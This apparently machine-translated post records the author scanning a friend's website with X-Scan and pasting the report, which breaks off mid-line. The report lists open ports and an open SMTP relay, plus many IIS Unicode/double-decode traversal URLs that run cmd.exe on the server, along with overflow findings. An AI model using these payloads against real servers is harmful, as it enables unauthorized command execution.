Today I am bored and can't even go back home ~~ A friend asked me to test a site.
I opened the address!! Maybe it's hard for him to open the address:
[The website you want to connect to is being established. Currently, there is no website details page. It may be being upgraded.
Please try again later. If the problem persists, contact the website administrator.]
Haha !!
I'm not afraid of an old saying that I won't scan it. That's not it.
A real hacker
Come to X-Scan.
****.**.**.**
The scan results are as follows:
X-Scan detection report
------------------
Detection Result
-Active HOST: 1
-Number of vulnerabilities: 22
-Warning count: 16
-Number of prompts: 6
Host list
* **. ** (Security Vulnerability Detected)
. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443
Details
****.**.**.**:
. Open Port list:
O smtp (25/tcp) (Security Warning discovered)
O domain (53/tcp) (Security Prompt discovered)
O www (80/tcp) (security vulnerability discovered)
O https (443/tcp) (Security Prompt discovered)
O ftp (21/tcp) (Security Prompt discovered)
. Port "smtp (25/tcp)" Security Warning discovered:
The SMTP server does not support user authentication and allows anonymous users to use it.
. Port "smtp (25/tcp)" Security Prompt:
A smtp server is running on this port
Here is its banner:
220 altsyz-web Microsoft esmtp mail Service, Version: 5.0.2195.2966 ready
Wed, 20 Oct 2004 06:28:38 +0800
NESSUS_ID: 10330
. Port "domain (53/tcp)" Security Prompt:
Maybe the "domain" service running on this port.
NESSUS_ID: 10330
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/. % 25% 35% 63 .. % 25% 35% 63 winnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/. % 35c .. % 35 cwinnt/system32/cmd.exe? /C + di
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/. % 35% 63.% 35% 63 winnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/... % 255c... % 255 cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 winnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35c .. % 35c .. % 35c .. % 35c .. % 35 cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 winnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 255c .. % 255c .. % 255c .. % 255c .. % 255 cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 winnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35c .. % 35c .. % 35c .. % 35c .. % 35c .. % 35 cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 winnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 255c .. % 255c .. % 255c .. % 255c .. % 255c .. % 255 cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/... % u00255c .. % u00255cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % u00255c .. % u00255c .. % u00255c .. % u00255c .. % u00255cwinnt/system32/cmd.exe? /C + dir
. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
. Port "www (80/tcp)" security vulnerability discovered:
The remote Microsoft Frontpage server seems vulnerable to a remote
buffer overflow. Exploitation of this bug could give an unauthorized
user access to the machine.
The following systems are known to be vulnerable:
Microsoft Windows 2000 Service Pack 2, Service Pack 3
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Office XP, Microsoft Office XP Service Release 1
Solution: Install relevant service pack or hotfix from URL below.
See also:
http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx
Risk factor: High
CVE_ID: CAN-2003-0822, CAN-2003-0824
NESSUS_ID: 11923
Other references: IAVA: 2003-A-0033
. Port "www (80/tcp)" security vulnerability discovered:
There's a buffer overflow in the remote web server through
the ISAPI filter.
It is possible to overflow the remote web server and execute
commands as user SYSTEM.
Solution: See
http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor: High
CVE_ID: CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,
CVE-2001-0508, CVE-2001-0500
BUGTRAQ_ID: 2690, 3190, 3194, 3195
NESSUS_ID: 10685
. Port "www (80/tcp)" security vulnerability discovered:
The IIS server appears to have the .htr ISAPI filter mapped.
At least one remote vulnerability has been discovered for the .HTR
filter. This is detailed in Microsoft Advisory
MS02-018, and gives remote SYSTEM level access to the web server.
It is recommended that, even if you have patched this vulnerability,
you unmap the .HTR extension and any other unused ISAPI extensions
if they are not required for the operation of your site.
Solution:
To unmap the .HTR extension:
1. Open Internet Services Manager.
2. Right-click the Web server and choose Properties from the context menu.
3. Master Properties
4. Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.
In addition, you may wish to download and install URLSCAN from the
Microsoft Technet Website. URLSCAN, by default, blocks all requests
for .htr files.
Risk factor: High
CVE_ID: CVE-2002-0071
BUGTRAQ_ID: 4474
NESSUS_ID: 10932
Other ref